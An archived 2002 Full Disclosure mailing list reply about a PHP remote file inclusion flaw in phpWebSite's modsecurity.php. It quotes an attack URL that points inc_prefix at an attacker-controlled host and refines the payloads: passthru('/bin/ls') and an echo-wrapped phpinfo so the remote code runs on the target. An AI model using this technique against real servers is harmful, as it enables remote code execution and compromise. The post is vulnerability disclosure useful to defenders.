Full Disclosure mailing list archives
Re: PHP source injection in phpWebSite
From: avart () gmx de (avart () gmx de)
Date: Mon, 23 Sep 2002 19:04:41 +0200 (MEST)
Hi Tim!
-------- modsecurity.php -------- <?php global $inc_prefix; if(!$inc_prefix) { ... } ... include_once($inc_prefix."htmlheader.php"); ?> ---------------------------------- If someone request a URL like http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, the htmlheader.php file from MYBOX would be included, and the attacker would be able to include any code he wants. Examples ======== http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/ --- htmlheader.php --- <? passthru("/bin/ls") ?> ---------------------- Output: dir listing of the current dierctory
That's not completely right. You have to put an "echo" (with the right quoting around the evil code), because the evil webserver (MYBOX) usually execute files ending with .php (if MYBOX doesn't do it, the example is ok). So usually you want to put the following line in htmlheader.php on the evil server (MYBOX): <?php echo "<?php phpinfo();?>" ?> . Now, if you request MYBOX/htmlheader.php the following line would be included (and executed): <?php phpinfo();?> In the example of Tim, the /bin/ls output from the evil machine (MYBOX) would be included, because htmlheader (usually) get's executed, because of the .php suffix. It's important to point to it, I got a lot of mails from users, that didn't get how to include $evil_code when $evil_machine (aka MYBOX) interpretes files with the .php suffix. Just my 0,2 EUR-Cents Regards, Avart -- Werden Sie mit uns zum "OnlineStar 2002"! Jetzt GMX wählen - und tolle Preise absahnen! http://www.onlinestar.de
Current thread:
- Re: PHP source injection in phpWebSite avart () gmx de (Sep 23)